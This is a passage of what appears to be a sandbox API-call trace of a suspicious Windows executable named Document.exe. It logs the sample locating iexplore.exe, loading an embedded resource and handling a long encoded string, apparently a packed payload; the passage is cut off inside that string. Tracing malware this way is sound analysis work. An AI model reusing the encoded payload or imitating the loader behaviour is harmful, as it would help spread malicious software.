(dwDesiredAccess=0x100000, bInheritHandle=0, lpName="I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441") returned 0x0 [0194.898] GetLastError () returned 0x2 [0194.898] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.898] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8e0 | out: ppsaOut=0x18f8e0) returned 0x0 [0194.898] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0afc, Msg=0x45b06d8c, wParam=0x0, lParam=0x0) returned 0x76234950 [0194.898] LoadLibraryW (lpLibFileName="kernel32") returned 0x76220000 [0194.899] GetLastError () returned 0x578 [0194.899] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7c8 | out: ppsaOut=0x18f7c8) returned 0x0 [0194.899] SafeArrayDestroyDescriptor (psa=0x5e3ec0) returned 0x0 [0194.899] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7c8 | out: ppsaOut=0x18f7c8) returned 0x0 [0194.899] SafeArrayDestroyDescriptor (psa=0x5e3ec0) returned 0x0 [0194.899] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7c8 | out: ppsaOut=0x18f7c8) returned 0x0 [0194.899] SafeArrayDestroyDescriptor (psa=0x5e3ec0) returned 0x0 [0194.899] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7c8 | out: ppsaOut=0x18f7c8) returned 0x0 [0194.899] SafeArrayDestroyDescriptor (psa=0x5e3ec0) returned 0x0 [0194.899] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x37 [0194.899] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e3ca0, nSize=0x200 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x37 [0194.899] GetLastError () returned 0x0 [0194.899] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.900] VarBstrCmp (bstrLeft="2", bstrRight="1", lcid=0x0, dwFlags=0x30001) returned 0x2 [0194.900] VarBstrCmp (bstrLeft="2", bstrRight="2", lcid=0x0, dwFlags=0x30001) returned 0x1 [0194.900] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x18f828 | out: ppsaOut=0x18f828) returned 0x0 [0194.900] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.900] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f4 | out: ppsaOut=0x18f8f4) returned 0x0 [0194.900] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0ad4, Msg=0xf2e1a979, wParam=0x0, lParam=0x0) returned 0x76231b48 [0194.900] LoadLibraryW (lpLibFileName="kernel32") returned 0x76220000 [0194.900] GetLastError () returned 0x578 [0194.900] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7e4 | out: ppsaOut=0x18f7e4) returned 0x0 [0194.900] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.900] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7e4 | out: ppsaOut=0x18f7e4) returned 0x0 [0194.900] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.900] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7e4 | out: ppsaOut=0x18f7e4) returned 0x0 [0194.900] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.901] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7e4 | out: ppsaOut=0x18f7e4) returned 0x0 [0194.901] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.901] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x16 [0194.901] GetEnvironmentVariableW (in: lpName="PROGRAMFILES", lpBuffer=0x5e36c4, nSize=0xff | out: lpBuffer="C:\\Program Files (x86)") returned 0x16 [0194.901] GetLastError () returned 0x578 [0194.901] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.901] WideCharToMultiByte (CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x18f3cc, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0) [0194.901] GetFullPathNameA (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", nBufferLength=0x104, lpBuffer=0x18f608, lpFilePart=0x18f3c4 | out: lpBuffer="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpFilePart=0x18f3c4*="iexplore.exe") returned 0x35 [0194.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x18f854, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpUsedDefaultChar=0x0) returned 54 [0194.901] FindFirstFileA (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", lpFindFileData=0x18f3a4 | out: lpFindFileData=0x18f3a4) returned 0x5e3650 [0194.902] FileTimeToLocalFileTime (in: lpFileTime=0x18f3a8, lpLocalFileTime=0x18f378 | out: lpLocalFileTime=0x18f378) returned 1 [0194.902] FileTimeToSystemTime (in: lpFileTime=0x18f378, lpSystemTime=0x18f380 | out: lpSystemTime=0x18f380) returned 1 [0194.939] CompareStringA (Locale=0x0, dwCmpFlags=0x0, lpString1="", cchCount1=1, lpString2="", cchCount2=1) returned 2 [0194.939] CompareStringA (Locale=0x0, dwCmpFlags=0x1, lpString1="OS=Windows_NT", cchCount1=2, lpString2="TZ", cchCount2=2) returned 1 [0194.939] GetTimeZoneInformation (in: lpTimeZoneInformation=0x72a50f68 | out: lpTimeZoneInformation=0x72a50f68) returned 0x0 [0195.011] FileTimeToLocalFileTime (in: lpFileTime=0x18f3b0, lpLocalFileTime=0x18f378 | out: lpLocalFileTime=0x18f378) returned 1 [0195.011] FileTimeToSystemTime (in: lpFileTime=0x18f378, lpSystemTime=0x18f380 | out: lpSystemTime=0x18f380) returned 1 [0195.011] FileTimeToLocalFileTime (in: lpFileTime=0x18f3b8, lpLocalFileTime=0x18f378 | out: lpLocalFileTime=0x18f378) returned 1 [0195.011] FileTimeToSystemTime (in: lpFileTime=0x18f378, lpSystemTime=0x18f380 | out: lpSystemTime=0x18f380) returned 1 [0195.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f730, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0195.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f730, cbMultiByte=-1, lpWideCharStr=0x5e0ad4, cchWideChar=13 | out: lpWideCharStr="iexplore.exe") returned 13 [0195.011] VarBstrCmp (bstrLeft="iexplore.exe", bstrRight=0x0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0195.048] GetUserDefaultLCID () returned 0x409 [0195.048] FindResourceExA (hModule=0x400000, lpType=0xa, lpName=0x29a, wLanguage=0x409) returned 0x0 [0195.048] FindResourceA (hModule=0x400000, lpName=0x29a, lpType=0xa) returned 0x4080f8 [0195.048] LoadResource (hModule=0x400000, hResInfo=0x4080f8) returned 0x408f28 [0195.048] SizeofResource (hModule=0x400000, hResInfo=0x4080f8) returned 0x22108 [0195.048] LockResource (hResData=0x408f28) returned 0x408f28 [0195.049] SafeArrayAccessData (in: psa=0x5e36a0, ppvData=0x18f948 | out: ppvData=0x18f948) returned 0x0 [0195.050] SafeArrayUnaccessData (psa=0x5e36a0) returned 0x0 [0195.050] SafeArrayCopy (in: psa=0x5e36a0, ppsaOut=0x18f9c8 | out: ppsaOut=0x18f9c8) returned 0x0 [0195.051] GetUserDefaultLCID () returned 0x409 [0195.052] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18f964, cchData=6 | out: lpLCData="1252") returned 5 [0195.052] SysStringByteLen (bstr="\x87d2\x7c45\xa509\x3747\x462d\xd634\x2d37\xce64\x33a6\xfa2d\x7134\x2c1e\x755b\xa53\x34f\x30f2\x3a26\x312b\x3bf3\x8545\xf85a\x8c66\x472d\x9978\x7912\x583c\x332a\x320d\x2646\x5f54\x582a\x1257\x5235\x5e2c\x4039\x3114\x502b\x4365\x5b26\x5d67\x282d\x1014\x7e7c\x5c74\xb336\x2749\x441a\x273e\x316f\x32e7\xd29f\xeb45\xb4db\xb95d\x3008\x8a46\x51f5\xb8cf\x492d\x6c66\x4e5a\x303c\x374a\x440b\x1932\x2d76\x354b\x331b\x3355\xf772\x1852\x3462\xd55d\x3e45\x3e52\x35e7\x462b\x8434\xe433\x3244\xdf4c\x5149\x4e34\x2632\x34ab\x328a\x329b\xef49\x3756\xd635\x2448\x3644\x1c51\xb477\xc629\xb43f\xc08e\x3150\x315b\x4225\x4932\x1132\x354b\x31d2\x37d4\x3cc0\x3657\xe6d0\x3641\xd45\x3152\x3067\x2e2d\x5ee2\x2932\x30ef\x3379\x7217\x6835\x1a33\x554f\xa556\x1d73\x5536\x402e\x314d\x9946\xb18f\xb50d\xbd52\xc358\x742e\x2d33\x5154\x5777\x364c\x3455\x2532\x3579\xb055\x322b\xbb44\xb457\xf1b2\x1ba9\x4237\x5621\x3f47\x27af\x66f4\xac3e\x316f\x3895\x4bed\xd774\xb528\x604f\xf24f\x5f5f\x6b98\x161c\xf137\xb048\x7e45\x701f\x674\x4603\x1870\x2d7f\x6219\x710f\x14dd\x7f79\x2f03\x7d48\x8d5f\x4c54\xcf52\x2429\x214b\x2536\x213a\x252c\x3c78\x4212\x500b\x12cc\xe50\xc5d\x7d29\x7630\x1237\xa4f\xd53\xcc52\x347d\x3069\x350b\x3176\x357a\x316c\x3078\x4212\x6bcb\x1237\xe50\xc5d\x7d29\x7630\x1237\xa4f\xcd53\x3769\x347d\x3649\x302b\x3456\x305a\x344c\x3558\x59d2\x4b35\x3232\x2e55\x2c58\x5d2c\x5635\x3232\xca4a\x3348\x3249\x315d\x3549\x302b\x3456\x305a\x344c\x2bb8\x592c\x4b35\x3232\x2e55\x2c58\x5d2c\x5635\xd232\x3454\x3348\x3249\x315d\x3549\x302b\x3456\x305a\x2aac\x2b46\x592c\x4b35\x3232\x2e55\x2c58\x5d2c\xb635\x2c2c\x3454\x3348\x3249\x315d\x3549\x302b\x3456\x2eba\x2a52\x2b46\x592c\x4b35\x3232\x2e55\x2c58\xbd2c\x482b\x2c2c\x3454\x3348\x3249\x315d\x3549\x302b\x2ab6\x2e44\x2a52\x2b46\x592c\x4b35\x3232\x2e55\xcc58\x4332\x482b\x2c2c\x3454\x3348\x3249\x315d\x3549\x2ecb\x2a48\x2e44\x2a52\x2b46\x592c\x4b35\x3232\xce55\x3246\x4332\x482b\x2c2c\x3454\x3348\x3249\x315d\x2ba9\x2e35\x2a48\x2e44\x2a52\x2b46\x592c\x4b35\x2232\x304b\x3246\x4332\x482d\x94e5\xc76b\x6778\x3324\x3042\xafe8\x91b4\x5d3b\x957e\xe921\xc47\xf12d\xf644\x8d41\x9321\x332b\xdee7\x3b95\x5b32\x47e9\x1957\x9032\x2730\x954d\x3146\x10e9\x43e4\xee66\x46e6\x262f\x5834\x9f6a\x43f4\x92e2\xd62d\x4c46\x8cfe\x2539\x1a09\x41f5\x3078\x1758\x3f34\xd5be\x9145\xd121\x9488\xf5f\x7c6b\x5f90\x3175\x692f\x4c2d\x3100\x8f33\x7239\x902d\xaa24\xb0c0\x46f5\x5ed6\x47eb\x316a\x15ed\x49fe\x348f\x5440\xa7e5\x392b\x41fb\x4287\x837\x8c6e\xb139\x92aa\x7c56\x9189\x5524\x6a34\xb24b\x2a45\xfb3a\x46e7\x7c3e\xf034\xa841\x91ce\xec2b\x426a\x3b96\xaa25\x47e8\x4f8c\x90d6\xf430\x97df\x4046\x3649\x1765\x972d\x7935\x7d2d\x5b62\x8f33\xb826\x9205\x935f\xc9a3\x5f92\xbaa2\x40f5\x3349\x3031\xe40b\x4397\xfd14\x43e4\xe013\x9640\xf85f\x543a\xf348\x9054\x4b2b\xe334\xbe46\x2d60\x47ea\x644f\x41f4\x7237\x9556\xa146\x975b\x7137\x353f\x46d3\x9cce\x2695\x723e\x90d4\x1e2b\xe34c\xb146\x2cb3\x484b\x93b8\x9724\xa477\x3424\x5310\x47e8\x50e4\x47f0\x4247\xe54f\xce46\x8f5e\xb326\xb3f4\xdc2c\xeb5a\x9c41\x34cb\xaf55\xb4d6\x530a\x46f5\x2d64\x9461\xa237\x34d3\xb41d\x5f2a\x7c29\x5f92\xb182\x7e5c\x59ad\x7b6e\x8c31\x9ec9\x17a8\x23da\x3002\xcbfe\xd11\x37cb\xb315\x8551\x36c5\x4279\xd525\xdd38\x34d6\xb16d\xca2f\xcb61\xc531\x37c9\xb07b\x3b58\x32c0\x61ae\x39b6\xb731\x147\x37d1\xb68b\x6e2f\xd661\xfd3d\x34d6\xb129\xa2f\x4bb6\x7873\x37c9\xb03b\xb354\x32c0\xb656\x136\xb71c\x8d52\x30d1\xb653\xa228\x51b6\x7813\x3016\x71ad\xde2c\x4876\x6f87\x214a\x7002\xf357\x3100\xf662\x453f\x378b\x6419\x3411\x76d7\x462c\x51f6\xefef\xd156\x710c\x522c\x4d76\xef5b\x5149\x3315\x660e\x3400\xf6d2\x1936\x340b\x730d\xd57\x7612\x62c\x5576\x6f77\x6155\x321b\x17e9\x41f6\x6f93\x294a\x3615\x715a\xf843\x7603\x6530\x378b\xf3fd\x1151\x3505\x1331\x5576\xef0f\x2951\x319b\x79\x535\x6f66\xd94f\x3095\x717a\x9c43\x3514\x64c8\x340b\x73ed\xed52\x3505\x489\x2835\x6f66\xa955\x321b\x21\xdd35\x2c71\x6073\x3315\x715e\x2043\x3514\x7378\x5548\x7310\xe152\x3505\x840d\x702e\x2c71\x2410\x371b\x75\x5135\x2973\x523\xb240\x3316\xc0aa\xcba9\x70cb\x1d93\x3145\xb563\xc46\x44ae\x8d34\x333\x9a20\xf429\x3a0\xc9bb\x9e8a\x10f1\xf81b\xb055\x3247\x7057\x3133\x6649\x442a\x3121\x5124\x45ae\x98cb\x2d02\x3154\x1ae4\x200a\xe2eb\x6e9a\xb94b\x88bf\x5d98\xf40c\x3450\x405e\x7535\xd12b\x72f5\x8a47\xabe2\x6061\xe720\x3106\x7c63\x7180\x2fad\x3cfc\x824b\x325b\x33fc\xe322\x1fc5\x2372\x3751\x5117\x7850\x37a6\x462a\x1234\x4041\x5019\x5d30\x4a2d\x4839\x4835\x2c44\x3256\x2314\x1242\x1756\x26d4\x11b6\x3140\x7353\x4628\x7740\x7234\x2d33\x3173\x3371\x4203\x6301\xedc2\xa349\x3537\x5784\x7442\x7456\x3372\x31b6\x3045\x3173\xd0ff\x6a0\x56b4\x2d33\x3655\x3338\x43ac\x6510\x4da6\xd549\xd014\x8b54\xbcbb\x3aa8\x3036\x35cd\x25d5\xd513\xa041\x4607\x52c5\xcddf\xd152\xd0bd\x122b\xefb4\x2a39\x33a2\xd09f\x3550\xc2c3\x1850\x71bb\xc949\xd2a6\x9155\x9ab7\x40c6\x4134\x20d2\xc373\xb95f\xa271\x6d39\x39d7\x6363\xd8a8\x3942\xd27a\x3750\x37c6\xbbd5\x3105\xe901\x39a3\xe90d\x59df\xcd43\x6152\x3336\xf3a\x200c\x482a\x254a\x30c6\x3136\x71e9\x36b2\x2298\x3509\x5109\x3452\x14c4\xb71e\x3811\x6da7\x9d54\x23b9\x4bd7\x4d54\xcdcb\xf545\x7457\xde56\x5943\x1955\x305d\x1548\x4079\xb958\x1727\xa4a5\x173c\x2f33\x34d4\x25dd\x426d\x453c\xd33\x3389\x35cb\x357b\x6468\x35b6\x51a4\xad17\x31a5\x1043\x7547\x9a2d\x151a\xb133\xb14d\x3319\x6d29\x4975\x4dc7\x954a\xc7bb\x3316\x5076\x5057\x3154\xa543\x3125\x55ef\xbc47\x54f\x7434\x966b\x3115\x32e3\xfb2c\x7bca\xcd21\xd4e9\x33ed\x5754\x3143\x9e56\x4311\xc964\x2d25\x559f\x215b\x498d\x88ca\x20d3\x21d6\x33dd\x43c0\x4a5d\x2c4c\x317c\x64d7\x614\x663\x1e70\x353e\x4b0b\x30ef\x3559\x304e\x442a\x8e20\xcd03\xc109\x4d79\x222d\x893c\xc31\x9830\x3236\x53bf\xd143\x6c17\x6654\x5539\x9b7c\xd52b\x4e46\x464d\x34b5\xaf33\x3134\x7ed4\x732d\xc812\xaf14\x354a\xc07a\x9374\xa63e\x3416\x51f4\x332c\x39c5\x1d73\x745f\x4b2d\x67d0\x234f\x1c5c\xc75f\xd36d\x6d0c\x2d72\x6dc9\x30b7\xfd7e\x3002\x426\x3334\xc5c5\xf945\x75fa\x2447\x4685\x5474\xd787\x3117\xf5b5\x7206\x7918\x1d33\x2ebb\x24f\x8b57\x336f\x3866\x383c\xbaed\x3104\xbfe7\x843a\xb030\x4f04\x2df2\x2a61\x3218\x4298\x2ae8\x2cf3\x35ff\x3256\x4c72\xc048\xf852\xc1e1\x2552\x3b35\x8572\xa847\x4edd\x5454\xbcc\xcc54\x8a59\xfd2c\x5634\x3232\x2a4a\x2d56\x8257\x315d\x3457\x8e3e\x5542\xdd47\x7023\xb011\x619d\x4205\xddb7\x3a79\x256d\x1209\xde22\x7535\x35bb\x2ff\xeb56\xf7\xf456\x3104\x5fd\x45\xb62\x19d7\xe627\x4244\xddf3\x8965\x724a\x482d\x3954\xe133\x34fb\xc25b\x3317\x1842\x7664\x4d34\x74c2\x3145\x41fb\x3406\xd771\x5475\x11cf\x8121\xb24c\xb72c\x4820\x9831\xb44b\x4d55\x33e3\x3343\x34e3\x32b5\x35fc\x3544\x35e7\x9846\x6f2d\x580b\x2103\x41e8\x4765\x4e1d\x42b6\x2d83\x2fc3\x3217\x74d\x904e\x3d02\x3719\xc555\xfd45\x3563\xd475\x7fdd\x96cc\xdc3\xae4\x8f29\xf226\xb960\x9533\x353b\x24f\x3317\x468\x3466\x164\x5549\x3175\x14c7\x74c7\xca2d\x148f\x133\x3f64\x2973\x421d\x79bc\xed32\x36bb\xdddb\x7332\x8142\x1059\x81c4\x8448\x8845\x75d3\xa047\x6c3\xb034\x2d03\x45be\x3269\x7299\x9134\x2c43\x3d6b\x3278\x2b57\x5c43\x76ea\x8534\x777a\x31bd\xb313\x2537\x46ec\x5a41\x2c72\x31e1\xf23a\xf62c\x4834\x2433\x3a74\x36a7\xbeea\x2b32\x841a\x7f\xad46\x715e\x6683\x8706\x7200\x3e21\x3d35\x31a4\x72f1\x5b1d\x925c\x2d73\x549\xce5b\x8357\xd842\x7483\xc134\x75b7\x31c5\xc13\x3407\x4771\x4dc4\x9d3a\xd54\xfb\x9e20\x825\x2b33\x5f7\xc357\x2b1b\x705e\x1056\x2364\x3508\x155\xa953\x37b7\x7d9\x5084\xd297\x3114\xc339\x62d\x7935\x1533\x744b\xf657\x725d\x3016\x8426\x9534\x3579\x181\xcd53\x412\x9a2d\x5404\x9d27\x174\x3369\x777d\x4904\x1d5b\xcd4b\x3127\x3cfe\xe042\xce56\x3175\xb8c1\x3104\x3563\x75dc\x962d\x1584\x8933\xb154\x3318\x5ac5\x4976\xef8b\xc5d6\x1651\x3315\x31f8\x154\xce24\x37c8\x31f0\x3652\x34f2\x45ac\x5481\x2932\x31e1\xb236\xf729\x4834\x9836\x254b\x37d7\x33e2\x9c43\x1756\x258b\x3f49\xc1d9\xd968\x17b7\x5207\x5484\xdda7\x3f5b\x10ad\x47c9\x64ac\x7135\x35bb\x2d26\x9daa\x1132\x9902\x374\x8d29\x3135\x587\xc047\x7678\x4034\x2c43\x16c\x6759\x421d\x9c40\x2d03\x5d3\xe657\x3366\xf6\xd456\x3230\x3566\x3055\x875f\x3406\xd8e5\x1534\x3533\x7095\x9359\x1299\x4975\x95a3\x7fb\xc297\xe646\xc003\x8a46\x3175\x8989\x2375\x25b8\x3406\xaf65\x54c4\x6ccd\x3154\xdb0d\x426c\x4b34\x2d71\x8fb5\x31d6\x3e23\x3443\x34e3\x35b5\x35fc\x3444\x80e4\xb547\xf328\x834\x2b33\x31e1\xb3fd\xff2b\x4981\x2ddb\x804c\xb357\x8651\x42\x3c56\x84c3\xb449\x844d\xdd53\x3d47\x4698\x5db5\x2d86\x3077\x8753\x432d\x5634\x3b45\x5f63\x7351\xa024\x20c3\xa78a\x3174\x2655\x1a75\x5032\x2a7f\x1ada\x7850\x6159\x3552\x33a9\x26dc\x93b8\x140\x5803\x32a3\x4306\x8142\x7855\x31cc\x36b8\x2149\x2553\x4c47\x471d\x567c\x2c77\x30b5\xff59\x61e\x9d33\x6c52\x19b8\xc1a7\x3316\x3a\x4879\x9d2e\xff9\xc158\x4557\xac5d\x72a\x5460\x9dc3\x9948\x3269\x72b1\x9d32\x5d32\x2d4b\x7293\x4756\x72ca\x3456\xbc30\x350b\xe275\xdd12\x3047\x3651\x982c\x3303\x30a4\xc9\x4259\xd968\x5136\x35bb\xad62\x35d7\x71ca\x3366\xfb54\x320d\x45c9\x9a52\xc492\x852d\x5404\x1de4\xda54\x3369\x401c\x7861\xa138\x323b\xc253\x3926\x3072\x2346\x3104\x3438\x3174\x74eb\x5247\x7510\x9490\xbc89\x5953\x934f\x812c\x4803\xbc0c\x843\xa356\x4d5f\xa040\x75c\x3035\x3349\xe4e\x57e\x2841\x6bd\x7434\x1d50\x403d\xe7ca\x232\x1aa4\x3840\x659f\x5bba\x350\x30b2\x4486\xbb7a\x508\x9157\x7580\xec47\x465d\x61f2\x2d03\x8110\x791b\x421d\xa05\x396b\x858a\x1222\x3316\x8aea\x2166\x7f84\x69e3\x23f5\x8573\x5847\x445d\x6464\x8731\x8160\x2358\x421d\x7978\xe133\x347b\xe0e5\x3366\x9bba\x4c26\x3244\x535\x9b45\x5db\xac47\x461d\x649c\x9133\x3125\xc304\x24f\x4b84\x7802\x723a\x201\x6f52\x27\x5656\x3104\x2065\x71b5\x3763\x6db7\x461d\xa534\xb843\x31a4\x365\x1e2d\x3236\x4883\x7742\x6e57\x7288\x3042\x5e42\x3177\x1b3d\x9907\x7d53\x84e9\xcc66\x1704\x5df4\x3f00\x3b4\x31c\x3936\xf914\x35f3\x3217\xd2a9\x50f8\x765f\x3124\xcbf0\x3357\x69e3\x7599\x40bc\x406c\x6e59\x6952\x1d2d\xce2a\x110\x2a9d\x9dc7\x35dd\x8b78\x3985\x2251\xdc80\x234f\x3144\x3572\x8c97\x6a0\x5534\xd233\x3150\x2558\x7e2d\x9a0\x1933\x76ab\x3057\x3363\xf04e\x7476\x3834\x3749\x3065\x3545\x306b\x4000\x15a8\x2233\xf4c0\x3319\x42cd\x6537\xeb23\x350b\x32d3\xa355\x7053\x3456\x1f80\x3508\x895d\xdd13\xa847\x4634\xa637\x7e30\x556\x37e9\x622d\x842\xf933\x743e\x3057\xb3ee\x3441\x7521\x5934\xb5f8\x3104\x801b\x3406\x4797\xab38\xeab6\x2155\x36dc\x562c\x4cb1\x3532\x30ce\x2e56\xb611\x3147\xb076\x3031\x2349\x8ac3\x2d7b\x7526\x472d\x5589\x1a0\x71c6\x3319\xa081\x4977\x2d37\xb14d\x1047\x3316\xf44e\x800b\x4bcf\x33dd\xf111\x3450\x3187\x9bf9\x2f7\xb9a9\x3290\xf3c5\xc22c\x4931\xe5ab\xb748\x3251\x3f52\x2042\xf056\x35f4\x4141\x754c\x32d2\xf847\x21e\x5374\x852b\x3114\xf3e3\x8447\x8921\x3d33\x378b\xf225\x3757\x7006\x3452\xf150\xd533\x7106\x2953\xf446\x822f\x1419\xa133\x7108\x335d\x82c9\x892d\x6f55\x6d4b\x5d57\x3317\x67da\x3417\x38bc\x7689\xfd19\x3090\x3407\x462f\x680e\x3873\xf128\xf65a\xc203\x4937\x6cef\x2e8b\xf837\x3412\xf4ce\xc853\xf175\x3e4a\x7166\x1453\x3487\x3318\x54f4\xed7a\x6c54\x3399\x48ec\x64f5\x2def\x756a\x3657\x7345\x3a42\xf47b\x2134\x3589\x3484\xf505\xb540\xe69\x5010\x2d07\x8857\x336d\xbd28\xa81e\x2eb5\xb771\x8a54\x3ad7\xd24\x71e\x8bf4\x1288\x272d\x3053\xcb84\x42ea\x7ff5\x29fe\x1e95\x379d\x6fac\x47f6\x1ef2\xf60a\x3253\x3256\x3742\xf584\x6168\x75c6\x145\x5693\x7449\x7631\x7074\x2d73\x3177\xf219\x4233\x5514\x44c2\x914d\x1b97\xd792\x70c2\x7c56\x7038\x9d49\x6085\xcd73\x754c\xd02d\x55f4\x221b\x707c\x4759\x48ed\x89b8\x5d33\xb546\x3216\x2272\x3003\xf4aa\x6731\x7569\xf0b4\x3d0d\x3d87\x8691\xa432\x2465\xa994\x3299\x8261\x8137\x2cf3\x34a7\x3297\x3966\x3003\x966a\x3574\x6949\x2185\x88e7\x3407\x4301\x5254\x4d01\xd154\x7257\xba2d\xa915\x2930\x756e\xd357\x7760\x38f9\x3416\x518c\x7d24\x7187\x3953\x8dd7\x464d\x54d4\xe587\x3115\x5359\x359\xd934\x6cba\x374b\x52cb\xa700\x7180\x6056\x21a2\x3508\xa155\x3ab3\x75a6\x662d\x2d18\x2d72\x5128\x4b59\x4246\x4975\xac73\x3508\xa1cf\x72d6\x42\x764b\x8b34\x3248\x54ba\x3407\x514f\x472c\x313d\x2c32\x545e\x3258\x9d26\x4851\x2132\x342e\x3f56\x3233\x30be\x5158\xce35\x3a48\x3020\x2552\x3522\x572c\x5551\x3f32\x3031\x32d6\x273e\x4835\x4927\x344a\x2c57\x730\xd846\x533c\x9d52\x75da\xd945\x5146\xe021\x65cd\x3027\x2155\x942a\x2115\xa2a5\x2835\xe155\xd6aa\xd661\xd73b\xdc43\x34b6\x835\xdda1\x5444\x2135\x1227\x466d\x5340\x4b54\x635\x9b1d\x24c\x3834\x7d54\x37ab\x52eb\x156\x50c2\x3456\xd118\xd52f\x5545\x9dff\x3407\xa645\xcc34\x2d53\x5120\x1959\x229d\xf134\x4753\x5597\xd247\x32c9\x422\x7767\x5134\x741f\xef45\x5537\xd52d\xa744\xb536\x655a\x2354\x5ab4\x6e7b\x5854\x44da\xd507\x6956\x3336\xe5c7\x3436\x51ad\x9849\x3125\x5522\x5547\xab34\x4e55\xcd23\xd84d\x5930\x4149\x20c8\x2272\x5794\xd335\xd745\x7126\x565c\x5136\x20a9\x332b\xd50c\x5950\xa72f\x372d\xcc31\x3e3d\x63f\x4185\x4d4\xa956\xa597\x3217\xd27e\x738a\x3c56\x3a94\x1215\x4fa5\x37\x1027\xb0d0\x603a\x2cd3\x435\x9815\xc54d\x46b5\xc94f\xb14a\x32b3\xd7d6\x6a42\xd4de\x3634\x3149\xaaa4\x55e3\x446\x2e28\x3801\x41d3\xf038\x3319\x528d\x824\x7133\x352b\xf64f\x1716\x5c42\x3db6\xae74\x5129\x71bc\x355d\xaaa6\x934c\x5fd5\x52c7\x3115\xef59\x389\xd34\x6ca4\x374b\x52bb\x4332\x726b\x7056\x41b8\x3508\x6de1\x3233\x3227\x40cc\xf048\x6d85\x4f74\x335b\x715c\x29f8\x283c\x622\xd2a4\x3457\x706a\x2f56\x5161\x1a49\x3125\x5510\x6347\x464d\xe35f\x2d53\x3cb5\x25b8\xa291\xa005\x7d00\x362b\x56a9\x3336\xa7e5\x26f7\x1a19\x3f18\x3078\x3e02\x9b8\x172c\x6938\x7c32\x559\x6558\x1333\x743a\x8e32\x3a1a\x3364\x3357\x865a\x1c4d\x2a8c\xb953\x58f5\x45af\x4571\x621f\x141d\x2d37\x8559\x4742\xb52a\xb93a\x1de0\x8447\x3a4c\x40b4\xc74\x35a6\x31c5\x713f\x3135\x3ae2\xcc07\xf72d\xe52b\x4128\x15d\xb58\x352e\xa102\x6c17\xff4b\x2a3\xb756\x2c72\xe7f6\x2bc4\x3539\x2169\x276\x45c2\x5e44\x51c4\x93ff\x7164\xf759\xb292\x3935\xc97c\x2526\x3215\xb84e\x7cb2\x75cb\xb334\x5dd\x496c\x7408\xfc47\x465d\x25bb\x9c06\x4e56\xe233\x4225\xc534\x2a83\x8c1e\x9e4c\x33a6\xf9\xe556\x3104\x6344\xc16f\x539\x147\x461d\xa4d1\xd433\x123\x6259\xf32e\x3138\x2343\x2eb2\x3326\xcc88\x31b2\x1a9\x5ad7\x5fb4\x3bb4\x22c7\x5c31\x4ddc\x60c3\xcc32\x350\x736e\x4edd\x4809\x20c2\x3476\xc388\xe58\xc143\x759\x4035\x3171\x2df3\xd62\x4186\x8a15\x14ba\x5d33\x2de4\x728\xeaad\x91f\x6633\xb54b\x35e6\x3316\xff7e\x3a1d\x4148\x4b46\x8184\x4944\x7400\xac2d\x5444\x1e02\x4051\xf332\x429d\x14dc\x2d73\x74df\x3267\x36ae\x3003\x4454\x795d\x59c\x6dc1\xb6e3\x483\x1229\x5444\x3642\xc552\x32a9\xc75c\xb380\x2d70\x20a7\x93e7\x38a\xcc42\x3466\x3710\x7508\x545\x75bd\xe847\x449d\x3fa0\x2883\xbe5\x3d3\x4e28\x1a44\x7b02\x9f17\xc2f4\x2505\x5db2\x8796\x